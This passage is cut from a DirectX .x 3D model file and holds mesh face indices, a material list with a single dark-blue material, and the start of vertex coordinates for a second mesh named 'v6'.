4;1331,1329,1339,1340;, 3;1339,1338,1340;, 4;1338,1339,1335,1336;, 3;1336,1335,1337;, 4;1337,1335,1332,1333;, 3;1333,1332,1334;, 4;1317,1318,1333,1334;, 3;1318,1317,1319;, 4;1322,1320,1318,1319;, 3;1321,1320,1322;, 4;1320,1321,1336,1337;, 4;1325,1323,1321,1322;, 4;1319,1317,1327,1328;, 4;1334,1332,1329,1330;, 4;1011,978,979,1012;, 4;1012,979,980,1003;, 4;1003,980,981,1004;, 4;980,1296,1294,981;, 4;979,1279,1296,980;, 4;978,1278,1279,979;, 4;977,1282,1278,978;, 4;976,1284,1282,977;, 4;1009,976,977,1010;, 4;1010,977,978,1011;, 4;1008,975,976,1009;, 4;975,1286,1284,976;, 4;1283,1284,1286,1285;, 4;1281,1282,1284,1283;, 4;1277,1278,1282,1281;, 4;1280,1279,1278,1277;, 4;1295,1296,1279,1280;, 4;1293,1294,1296,1295;, 4;1291,1292,1294,1293;, 4;981,1294,1292,982;, 4;1004,981,982,1005;, 4;1005,982,973,1006;, 4;982,1292,1290,973;, 4;1289,1290,1292,1291;, 4;1291,946,947,1289;, 4;946,913,914,947;, 4;945,922,913,946;, 4;944,921,922,945;, 4;943,920,921,944;, 4;952,919,920,943;, 4;951,918,919,952;, 4;950,917,918,951;, 4;949,916,917,950;, 4;948,915,916,949;, 4;1287,948,949,1285;, 4;1285,949,950,1283;, 4;1283,950,951,1281;, 4;1281,951,952,1277;, 4;1277,952,943,1280;, 4;1280,943,944,1295;, 4;1295,944,945,1293;, 4;1293,945,946,1291;, 4;922,715,716,913;, 4;921,714,715,922;, 4;920,713,714,921;, 4;919,712,713,920;, 4;918,711,712,919;, 4;917,718,711,918;, 4;916,717,718,917;, 4;915,733,717,916;, 4;717,733,734,695;, 4;717,695,690,718;, 4;718,690,684,711;, 4;711,684,699,712;, 4;712,699,700,713;, 4;713,700,683,714;, 4;714,683,689,715;, 4;715,689,696,716;, 4;696,731,732,716;, 4;913,716,732,914;, 4;1285,1286,1288,1287;, 4;974,1288,1286,975;, 4;1007,974,975,1008;, 4;973,1290,1288,974;, 4;1287,1288,1290,1289;, 4;1289,947,948,1287;, 4;947,914,915,948;, 4;914,732,733,915;, 4;732,731,734,733;, 4;963,1270,1268,964;, 4;1267,1268,1270,1269;, 4;1269,937,938,1267;, 4;937,904,905,938;, 4;904,728,729,905;, 4;728,727,730,729;, 4;1001,968,969,1002;, 4;1002,969,970,993;, 4;993,970,971,994;, 4;970,1276,1274,971;, 4;969,1259,1276,970;, 4;968,1258,1259,969;, 4;967,1262,1258,968;, 4;966,1264,1262,967;, 4;999,966,967,1000;, 4;1000,967,968,1001;, 4;998,965,966,999;, 4;965,1266,1264,966;, 4;1263,1264,1266,1265;, 4;1261,1262,1264,1263;, 4;1257,1258,1262,1261;, 4;1260,1259,1258,1257;, 4;1275,1276,1259,1260;, 4;1273,1274,1276,1275;, 4;1271,1272,1274,1273;, 4;971,1274,1272,972;, 4;994,971,972,995;, 4;995,972,963,996;, 4;972,1272,1270,963;, 4;1269,1270,1272,1271;, 4;1271,936,937,1269;, 4;936,903,904,937;, 4;935,912,903,936;, 4;934,911,912,935;, 4;933,910,911,934;, 4;942,909,910,933;, 4;941,908,909,942;, 4;940,907,908,941;, 4;939,906,907,940;, 4;938,905,906,939;, 4;1267,938,939,1265;, 4;1265,939,940,1263;, 4;1263,940,941,1261;, 4;1261,941,942,1257;, 4;1257,942,933,1260;, 4;1260,933,934,1275;, 4;1275,934,935,1273;, 4;1273,935,936,1271;, 4;912,725,726,903;, 4;911,724,725,912;, 4;910,723,724,911;, 4;909,722,723,910;, 4;908,721,722,909;, 4;907,720,721,908;, 4;906,719,720,907;, 4;905,729,719,906;, 4;719,729,730,693;, 4;719,693,686,720;, 4;720,686,680,721;, 4;721,680,701,722;, 4;722,701,702,723;, 4;723,702,679,724;, 4;724,679,685,725;, 4;725,685,694,726;, 4;694,727,728,726;, 4;903,726,728,904;, 4;1265,1266,1268,1267;, 4;964,1268,1266,965;, 4;997,964,965,998;, 4;1181,1175,1166,1182;, 4;1180,1169,1175,1181;, 4;1179,1170,1169,1180;, 4;1178,1176,1170,1179;, 4;1177,1168,1176,1178;, 4;1193,1177,1178,1194;, 4;1194,1178,1179,1195;, 4;1195,1179,1180,1196;, 4;1196,1180,1181,1197;, 4;1197,1181,1182,1198;, 4;1216,1197,1198,1209;, 4;1215,1196,1197,1216;, 4;1214,1195,1196,1215;, 4;1213,1194,1195,1214;, 4;1212,1193,1194,1213;, 4;1239,1212,1213,1240;, 4;1240,1213,1214,1233;, 4;1233,1214,1215,1234;, 4;1234,1215,1216,1235;, 4;1235,1216,1209,1236;, 4;1254,1235,1236,1255;, 4;1253,1234,1235,1254;, 4;1252,1233,1234,1253;, 4;1251,1240,1233,1252;, 4;1250,1239,1240,1251;, 4;1184,1167,1168,1177;, 4;1200,1184,1177,1193;, 4;1211,1200,1193,1212;, 4;1238,1211,1212,1239;, 4;1249,1238,1239,1250;, 4;1123,1124,1045,1043;, 3;1045,1124,1046;, 4;1046,1124,1026,1044;, 3;1044,1026,1047;, 4;1026,1024,1048,1047;, 3;1039,1048,1024;, 4;1024,897,1049,1039;, 3;1049,897,1050;, 3;1050,897,1040;, 4;897,898,1051,1040;, 3;1052,1051,898;, 5;1117,1118,1041,1052,898;, 3;1041,1118,1053;, 3;1053,1118,1054;, 3;1042,1054,1118;, 4;1118,1119,1055,1042;, 3;1118,1117,1119;, 4;1119,1122,1056,1055;, 4;1043,1056,1122,1123;, 3;1123,1122,1124;, 3;898,897,1145;, 4;897,746,1147,1145;, 3;1147,746,743;, 4;1024,1028,1034,897;, 3;1026,1028,1024;, 3;1026,1030,1028;, 4;1030,1058,1059,1028;, 4;1027,1059,1058,1029;, 4;1029,1035,1036,1027;, 4;1023,1036,1035,1025;, 3;897,1034,746;, 3;1060,746,1034;, 3;1033,746,1060;, 6;791,746,1033,1038,868,866;, 4;1028,1059,1060,1034;, 4;1060,1059,1027,1033;, 3;1036,1033,1027;, 3;1033,1036,1038;, 4;868,1038,1036,1023;, 3;1023,851,868;, 4;1124,1122,1121,1120;, 4;1124,1120,1030,1026;, 4;1120,1111,1058,1030;, 4;1110,1111,1120,1121;, 4;1029,1058,1111,1138;, 4;1111,1109,1137,1138;, 4;1141,1137,1109,1112;, 3;1137,1139,1136;, 3;1137,1136,1138;, 4;1138,1136,1134,1135;, 4;1138,1135,1035,1029;, 4;1025,1035,1135,1132;, 4;1135,1134,1133,1132;, 4;1126,1129,1134,1136;, 4;1144,1126,1136,1139;, 3;1144,1125,1126;, 3;1126,1125,1127;, 3;1126,1127,1128;, 3;1126,1128,1129;, 13;828,829,794,795,796,846,896,847,842,875,843,827,884;, 4;829,891,830,794;, 4;1119,1116,1121,1122;, 4;1119,1117,1115,1116;, 3;1117,1032,1115;, 3;1117,898,1032;, 4;1032,1057,1107,1115;, 4;1107,1108,1116,1115;, 4;1116,1108,1110,1121;, 4;1127,1125,1106,1107;, 4;1127,1107,1057,1031;, 4;1031,1037,1128,1127;, 4;1131,1128,1037,867;, 3;867,902,1131;, 4;1105,1106,1125,1142;, 3;898,1145,1032;, 3;1145,1057,1032;, 3;1107,1106,1108;, 3;1106,1103,1108;, 3;1103,1106,1105;, 4;1114,1110,1108,1103;, 3;1114,1109,1110;, 3;1110,1109,1111;, 3;1114,1112,1109;, 3;1104,1103,1105;, 4;1104,1105,1069,1061;, 4;1105,1142,1070,1069;, 4;1062,1070,1142,1143;, 3;1143,1142,1144;, 4;1143,1144,1071,1062;, 4;1144,1139,1072,1071;, 4;1063,1072,1139,1140;, 4;1140,1141,1065,1063;, 4;1141,1112,1066,1065;, 4;1064,1066,1112,1113;, 3;1113,1112,1114;, 4;1113,1114,1067,1064;, 4;1114,1103,1068,1067;, 4;1061,1068,1103,1104;, 3;1140,1139,1141;, 4;1079,1061,1069,1080;, 4;1080,1069,1070,1081;, 4;1081,1070,1062,1082;, 4;1082,1062,1071,1083;, 4;1083,1071,1072,1084;, 4;1084,1072,1063,1073;, 4;1073,1063,1065,1074;, 4;1074,1065,1066,1075;, 4;1075,1066,1064,1076;, 4;1076,1064,1067,1077;, 4;1077,1067,1068,1078;, 4;1078,1068,1061,1079;, 4;1100,1042,1055,1101;, 4;1101,1055,1056,1102;, 4;1102,1056,1043,1085;, 4;1085,1043,1045,1086;, 4;1086,1045,1046,1087;, 4;1087,1046,1044,1088;, 4;1088,1044,1047,1089;, 4;1089,1047,1048,1090;, 4;1090,1048,1039,1091;, 4;1091,1039,1049,1092;, 4;1092,1049,1050,1093;, 4;1093,1050,1040,1094;, 4;1094,1040,1051,1095;, 4;1095,1051,1052,1096;, 4;1096,1052,1041,1097;, 4;1097,1041,1053,1098;, 4;1098,1053,1054,1099;, 4;1099,1054,1042,1100;, 4;500,539,540,501;, 4;499,538,539,500;, 4;498,549,538,499;, 4;497,548,549,498;, 4;496,547,548,497;, 4;495,546,547,496;, 4;494,545,546,495;, 4;493,544,545,494;, 4;492,543,544,493;, 4;491,542,543,492;, 4;490,541,542,491;, 4;501,540,541,490;, 4;539,590,591,540;, 4;538,589,590,539;, 4;549,588,589,538;, 4;548,587,588,549;, 4;547,586,587,548;, 4;546,597,586,547;, 4;545,596,597,546;, 4;544,595,596,545;, 4;543,594,595,544;, 4;542,593,594,543;, 4;541,592,593,542;, 4;540,591,592,541;, 4;339,316,274,340;, 4;338,317,316,339;, 4;337,282,317,338;, 4;336,315,282,337;, 4;614,317,312,619;, 4;615,316,317,614;, 4;657,274,316,615;, 4;591,657,615,592;, 4;592,615,614,593;, 4;593,614,649,594;, 4;594,649,616,595;, 4;595,616,617,596;, 4;596,617,644,597;, 4;597,644,611,586;, 4;586,611,610,587;, 4;587,610,646,588;, 4;588,646,613,589;, 4;589,613,612,590;, 4;613,318,319,612;, 4;341,319,318,342;, 4;340,274,319,341;, 4;612,319,274,657;, 4;590,612,657,591;, 3;318,613,658;, 4;295,318,658,636;, 4;637,294,295,636;, 4;329,295,294,330;, 4;330,294,277,331;, 4;654,277,294,637;, 4;600,654,637,601;, 4;599,634,654,600;, 4;634,297,277,654;, 4;331,277,297,332;, 4;332,297,296,333;, 4;635,296,297,634;, 4;630,301,296,635;, 4;609,652,635,598;, 4;598,635,634,599;, 4;608,640,652,609;, 4;607,641,640,608;, 4;606,643,641,607;, 4;605,638,643,606;, 4;604,639,638,605;, 4;603,647,639,604;, 4;602,636,647,603;, 4;601,637,636,602;, 4;581,622,645,582;, 4;580,623,622,581;, 4;579,651,623,580;, 4;578,620,651,579;, 4;577,621,620,578;, 4;621,310,311,620;, 4;353,311,310,354;, 4;354,310,275,355;, 4;656,275,310,621;, 4;576,656,621,577;, 4;575,618,656,576;, 4;574,619,618,575;, 4;585,648,619,574;, 4;584,625,648,585;, 4;583,624,625,584;, 4;582,645,624,583;, 4;619,312,313,618;, 4;618,313,275,656;, 4;355,275,313,356;, 4;619,648,649,614;, 4;648,625,616,649;, 4;617,616,625,624;, 4;644,617,624,645;, 6;643,638,611,644,645,622;, 3;623,643,622;, 5;643,623,627,642,641;, 4;623,651,626,627;, 3;626,651,650;, 4;629,650,651,620;, 3;642,632,641;, 4;640,641,632,633;, 4;652,640,633,653;, 4;635,652,653,630;, 5;610,611,638,639,658;, 3;647,658,639;, 3;636,658,647;, 3;610,658,646;, 3;613,646,658;, 4;533,584,585,534;, 4;532,583,584,533;, 4;531,582,583,532;, 4;530,581,582,531;, 4;529,580,581,530;, 4;528,579,580,529;, 4;527,578,579,528;, 4;526,577,578,527;, 4;537,576,577,526;, 4;536,575,576,537;, 4;535,574,575,536;, 4;534,585,574,535;, 4;482,533,534,483;, 4;481,532,533,482;, 4;480,531,532,481;, 4;479,530,531,480;, 4;478,529,530,479;, 4;489,528,529,478;, 4;488,527,528,489;, 4;487,526,527,488;, 4;486,537,526,487;, 4;485,536,537,486;, 4;484,535,536,485;, 4;483,534,535,484;, 4;317,282,283,312;, 4;282,315,306,283;, 4;315,314,307,306;, 3;307,314,286;, 5;287,281,309,286,314;, 3;281,287,305;, 4;281,302,308,309;, 3;308,302,280;, 3;311,280,302;, 4;357,312,283,346;, 4;356,313,312,357;, 4;346,283,306,347;, 4;347,306,307,348;, 4;350,309,308,351;, 4;351,308,280,352;, 4;352,280,311,353;, 4;620,311,302,629;, 4;629,302,303,628;, 4;365,303,302,366;, 4;364,276,303,365;, 4;628,303,276,655;, 4;566,628,655,567;, 4;567,655,631,568;, 4;655,276,300,631;, 4;363,300,276,364;, 4;362,301,300,363;, 4;631,300,301,630;, 4;568,631,630,569;, 4;569,630,653,570;, 4;570,653,633,571;, 4;571,633,632,572;, 4;572,632,642,573;, 4;573,642,627,562;, 4;562,627,626,563;, 4;563,626,650,564;, 4;564,650,629,565;, 4;565,629,628,566;, 4;521,572,573,522;, 4;520,571,572,521;, 4;519,570,571,520;, 4;518,569,570,519;, 4;517,568,569,518;, 4;516,567,568,517;, 4;515,566,567,516;, 4;514,565,566,515;, 4;525,564,565,514;, 4;524,563,564,525;, 4;523,562,563,524;, 4;522,573,562,523;, 4;470,521,522,471;, 4;469,520,521,470;, 4;468,519,520,469;, 4;467,518,519,468;, 4;466,517,518,467;, 4;477,516,517,466;, 4;476,515,516,477;, 4;475,514,515,476;, 4;474,525,514,475;, 4;473,524,525,474;, 4;472,523,524,473;, 4;471,522,523,472;, 4;512,551,552,513;, 4;511,550,551,512;, 4;510,561,550,511;, 4;509,560,561,510;, 4;508,559,560,509;, 4;507,558,559,508;, 4;506,557,558,507;, 4;505,556,557,506;, 4;504,555,556,505;, 4;503,554,555,504;, 4;502,553,554,503;, 4;513,552,553,502;, 4;551,602,603,552;, 4;550,601,602,551;, 4;561,600,601,550;, 4;560,599,600,561;, 4;559,598,599,560;, 4;558,609,598,559;, 4;557,608,609,558;, 4;556,607,608,557;, 4;555,606,607,556;, 4;554,605,606,555;, 4;553,604,605,554;, 4;552,603,604,553;, 4;295,284,285,318;, 4;284,292,321,285;, 4;320,321,292,293;, 6;287,320,293,288,289,304;, 3;305,287,304;, 4;288,290,299,289;, 4;298,299,290,291;, 4;278,298,291,279;, 4;301,278,279,296;, 4;335,314,315,336;, 4;334,287,314,335;, 4;345,320,287,334;, 4;344,321,320,345;, 4;343,285,321,344;, 4;342,318,285,343;, 4;327,292,284,328;, 4;326,293,292,327;, 4;328,284,295,329;, 4;358,289,299,359;, 4;369,304,289,358;, 4;368,305,304,369;, 4;367,281,305,368;, 4;366,302,281,367;, 4;325,288,293,326;, 4;324,290,288,325;, 4;323,291,290,324;, 4;322,279,291,323;, 4;333,296,279,322;, 4;397,346,347,398;, 4;398,347,348,399;, 4;399,348,349,400;, 4;400,349,350,401;, 4;401,350,351,402;, 4;402,351,352,403;, 4;403,352,353,404;, 4;404,353,354,405;, 4;405,354,355,394;, 4;394,355,356,395;, 4;395,356,357,396;, 4;396,357,346,397;, 4;448,397,398,449;, 4;449,398,399,450;, 4;450,399,400,451;, 4;451,400,401,452;, 4;452,401,402,453;, 4;453,402,403,442;, 4;442,403,404,443;, 4;443,404,405,444;, 4;444,405,394,445;, 4;445,394,395,446;, 4;446,395,396,447;, 4;447,396,397,448;, 4;348,307,286,349;, 4;349,286,309,350;, 4;359,299,298,360;, 4;360,298,278,361;, 4;361,278,301,362;, 4;391,340,341,392;, 4;392,341,342,393;, 4;393,342,343,382;, 4;382,343,344,383;, 4;383,344,345,384;, 4;384,345,334,385;, 4;385,334,335,386;, 4;386,335,336,387;, 4;387,336,337,388;, 4;388,337,338,389;, 4;389,338,339,390;, 4;390,339,340,391;, 4;430,391,392,431;, 4;431,392,393,432;, 4;432,393,382,433;, 4;433,382,383,434;, 4;434,383,384,435;, 4;435,384,385,436;, 4;436,385,386,437;, 4;437,386,387,438;, 4;438,387,388,439;, 4;439,388,389,440;, 4;440,389,390,441;, 4;441,390,391,430;, 4;670,665,659,671;, 4;669,664,665,670;, 4;678,663,664,669;, 4;677,660,663,678;, 4;671,659,662,672;, 4;672,662,668,673;, 4;673,668,667,674;, 4;674,667,666,675;, 4;675,666,661,676;, 4;409,358,359,410;, 4;410,359,360,411;, 4;411,360,361,412;, 4;412,361,362,413;, 4;413,362,363,414;, 4;414,363,364,415;, 4;415,364,365,416;, 4;416,365,366,417;, 4;417,366,367,406;, 4;406,367,368,407;, 4;407,368,369,408;, 4;408,369,358,409;, 4;460,409,410,461;, 4;461,410,411,462;, 4;462,411,412,463;, 4;463,412,413,464;, 4;464,413,414,465;, 4;465,414,415,454;, 4;454,415,416,455;, 4;455,416,417,456;, 4;456,417,406,457;, 4;457,406,407,458;, 4;458,407,408,459;, 4;459,408,409,460;, 4;379,328,329,380;, 4;380,329,330,381;, 4;381,330,331,370;, 4;370,331,332,371;, 4;371,332,333,372;, 4;372,333,322,373;, 4;373,322,323,374;, 4;374,323,324,375;, 4;375,324,325,376;, 4;376,325,326,377;, 4;377,326,327,378;, 4;378,327,328,379;, 4;418,379,380,419;, 4;419,380,381,420;, 4;420,381,370,421;, 4;421,370,371,422;, 4;422,371,372,423;, 4;423,372,373,424;, 4;424,373,374,425;, 4;425,374,375,426;, 4;426,375,376,427;, 4;427,376,377,428;, 4;428,377,378,429;, 4;429,378,379,418;; MeshMaterialList { 1; 1269; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.000000;0.000000;0.247059;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _manifoldt Frame _v6 { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh v6 { 202; -1.134014;1.071787;-0.540643;, -1.134013;1.071787;-0.511464;, -1.073551;1.068197;-0.477667;, -1.134012;1.071787;-0.441268;, -1.134011;1.071787;-0.412719;, -1.019050;1.064961;-0.478366;, -1.131934;1.106765;-0.412719;, -1.016973;1.099939;-0.478366;, -1.131938;1.106765;-0.540643;, -1.131937;1.106765;-0.511464;, -1.071475;1.103175;-0.477667;, -1.131935;1.106765;-0.441268;, -1.056612;1.068954;-0.422127;, -1.071102;1.069814;-0.422930;, -1.084632;1.070618;-0.422168;, -1.095831;1.071283;-0.420265;, -1.109136;1.072073;-0.415739;, -1.117974;1.072597;-0.410239;, -1.124663;1.072994;-0.403175;, -1.129101;1.073258;-0.395263;, -1.131391;1.073394;-0.387227;, -1.132202;1.073442;-0.377075;, -1.131503;1.073401;-0.368444;, -1.129693;1.073293;-0.361128;, -1.126659;1.073113;-0.354400;, -1.122777;1.072883;-0.348987;, -1.117642;1.072578;-0.344502;, -1.111980;1.072241;-0.341756;, -1.109578;1.072099;-0.341164;, -1.104704;1.071809;-0.340356;, -1.105434;1.071853;-0.362722;, -1.107163;1.071955;-0.363166;, -1.108017;1.072006;-0.363441;, -1.109876;1.072117;-0.364467;, -1.111516;1.072214;-0.365934;, -1.112810;1.072291;-0.367706;, -1.113770;1.072348;-0.369726;, -1.114451;1.072388;-0.372411;, -1.114647;1.072400;-0.375593;, -1.114255;1.072376;-0.379025;, -1.113290;1.072319;-0.382152;, -1.111472;1.072211;-0.385363;, -1.108934;1.072061;-0.388020;, -1.106310;1.071905;-0.389654;, -1.102127;1.071656;-0.391176;, -1.098012;1.071412;-0.392061;, -1.093088;1.071120;-0.392615;, -1.091797;1.071043;-0.392698;, -1.089214;1.070890;-0.392809;, -1.087774;1.070804;-0.392642;, -1.089437;1.070903;-0.388962;, -1.090916;1.070991;-0.383460;, -1.091617;1.071032;-0.376569;, 